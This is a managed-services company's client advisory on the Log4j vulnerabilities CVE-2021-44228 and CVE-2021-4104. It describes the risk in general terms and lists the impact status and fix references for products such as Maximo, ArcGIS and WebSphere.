Important security alert

Clarita’s response to the Apache Log4j 2 security vulnerability (CVE-2021-44228)

In Insight by Tara Annesley

At a glance

  • A high severity vulnerability was identified in Apache Log4j on 9 December.
  • This vulnerability impacts all organisations running internet-facing applications and the widely used Java based Log4j2 library.
  • Clarita's Managed Service Support team is currently assessing the impact for Clarita clients and will provide updates as the situation progresses with advice and suggested actions.

Updated 21 December 2021

IBM has advised of a second high priority vulnerability relating to WebSphere.

CVEID: CVE-2021-4104
CVSS Base score: 8.1

Description: Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system.

Additional Details: Clarita does not believe any of our clients currently use JMSAppender in any supported applications. However IBM's recommended solution is to apply an interim fix, which is available at:  Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046).

If you are Clarita EAMaaS customer, we will be applying this fix to your environments over the coming days.

If you are not a Clarita EAMaaS customer, and would like assistance to apply this latest fix, please contact Support.


A high severity vulnerability (CVE-2021-44228) impacting multiple versions of the Apache Log4j 2 utility was disclosed publicly on December 9, 2021. The severe vulnerability in the Java logging libraries allows unauthenticated remote code execution and access to servers.

The Apache Log4j 2 (named log4shell) vulnerability has a huge impact, since most web servers are equipped with Apache software.

It affects Java-based applications that use Log4j 2 versions 2.0 through 2.14.1. Log4j 2 is a Java-based logging library that is widely used in business system development, included in various open-source libraries, and directly embedded in major software applications. Because this vulnerability is in a Java library, the cross-platform nature of Java means the vulnerability is exploitable on many platforms, including both Windows and Linux.

Applications directly accessible on the internet - such as internet-facing mobile applications - are therefore at great risk.

A cybercriminal can only exploit this vulnerability when they have access to the application. The vulnerability is a remote code execution vulnerability that can allow an unauthenticated attacker to gain complete access to a target system. It can be triggered when a specially crafted string is parsed and processed by the vulnerable Log4j 2 component. This could happen through any user provided input.

Clarita is currently working through our application portfolio in order to conduct impact assessments. We are closely monitoring various vendor announcements to understand how and when this vulnerability can be addressed.

We will keep you updated on the impact of the vulnerability and actions required to mitigate your risk as our evaluation progresses.

Read more from the Australian Cyber Security Centre here.

Vendor Updates

Clarita will continue to monitor announcements and advice from the following product vendors and will update the below information as it comes to hand.

Application / Configuration Item Product Vendor Impact Assessment / Status References

Maximo

IBM

Under review

An update on the Apache Log4j CVE-2021-44228 vulnerability - IBM PSIRT Blog

EZMaxMobile

Interpro

Impact to v6.1.0 to 6.1.2

Clarita will perform the required actions for our Managed Service Support clients.

ArcGIS

Esri

Impact to v10.8 and lower

Urgent ArcGIS Software Security Alert – CVE-2021-44228 (aka Log4Shell aka LogJam) | Esri Australia Technical Blog (wordpress.com)

Geocortex products

Geocortex

No Impact

The version of log4j that is included with Geocortex Essentials and Geocortex Analytics is not vulnerable.

WebSphere

IBM

Impact to v9.0 and 8.5

Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)

webMethods

Software AG

Impact to v10.5 and greater

https://tech.forums.softwareag.com/t/log4j-zero-day-vulnerability/253849

Need immediate assistance?

Existing clients can log tickets through the Service Desk via phone, email or online portal.